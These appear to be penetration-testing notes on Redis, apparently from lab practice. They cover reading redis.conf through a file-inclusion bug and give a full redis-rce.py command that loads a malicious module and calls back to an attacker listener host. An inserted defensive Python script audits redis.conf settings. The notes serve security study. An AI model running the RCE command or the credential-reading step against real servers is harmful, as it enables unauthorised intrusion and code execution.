Redis (6379)
When nmap shows Redis open and the target has an LFI, use the LFI to read the Redis config file:
/etc/redis/redis.conf
Redis passwords are stored in the redis.conf file. Make sure to check for it with remote access or with LFI.
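The same file seen from the defender's side, as an added example that is not part of the original notes: a small audit that parses a redis.conf and flags the settings that make the password readable and the module-loading path reachable. The sample config, its placeholder password and the finding names are constructed for illustration.

```python
import shlex

# Constructed sample config (not from the page); the password is a placeholder.
SAMPLE_CONF = '''\
# constructed redis.conf excerpt
bind 0.0.0.0
protected-mode no
port 6379
requirepass "Placeholder-Passw0rd"
'''

LOOPBACK = {"127.0.0.1", "::1"}

def parse_conf(text):
    """Map each directive (lowercased) to the list of its argument lists."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # redis.conf allows quoted arguments
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf

def audit(text, file_mode):
    """Return finding ids; file_mode is the permission bits of the config file."""
    conf = parse_conf(text)
    last = lambda key: conf[key][-1] if key in conf else None
    findings = []
    if last("requirepass") is None:
        findings.append("no-requirepass")
    elif file_mode & 0o004:
        # Any local user, or a file-read bug in a co-hosted app, gets the password.
        findings.append("password-in-world-readable-file")
    # Redis listens on all interfaces when no bind directive is present.
    addrs = [a.lstrip("-") for a in (last("bind") or ["*"])]
    if any(a not in LOOPBACK for a in addrs):
        findings.append("non-loopback-bind")
    if last("protected-mode") == ["no"]:
        findings.append("protected-mode-off")
    # Module loading is blocked by `enable-module-command no` (the Redis 7
    # default) or by renaming MODULE away; older versions need the rename.
    renamed = any(a and a[0].upper() == "MODULE"
                  for a in conf.get("rename-command", []))
    if not renamed and last("enable-module-command") != ["no"]:
        findings.append("module-command-not-restricted")
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE_CONF, 0o644))
```

On a real host, pass `os.stat(path).st_mode` as `file_mode`; an empty list means none of these four conditions were found.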
Redis-RCE
python3 redis-rce.py -r 192.168.210.166 -p 6379 -L 192.168.45.225 -P 9003 -v -a "Ready4Redis?" -f exp.so
Check for info when connected
info
Resources
https://hackviser.com/tactics/pentesting/services/redis
https://secybr.com/posts/redis-pentesting-best-practices/
https://book.hacktricks.wiki/en/network-services-pentesting/6379-pentesting-redis.html#redis-authentication
Exploits
https://www.exploit-db.com/exploits/47195
https://github.com/n0b0dyCN/RedisModules-ExecuteCommand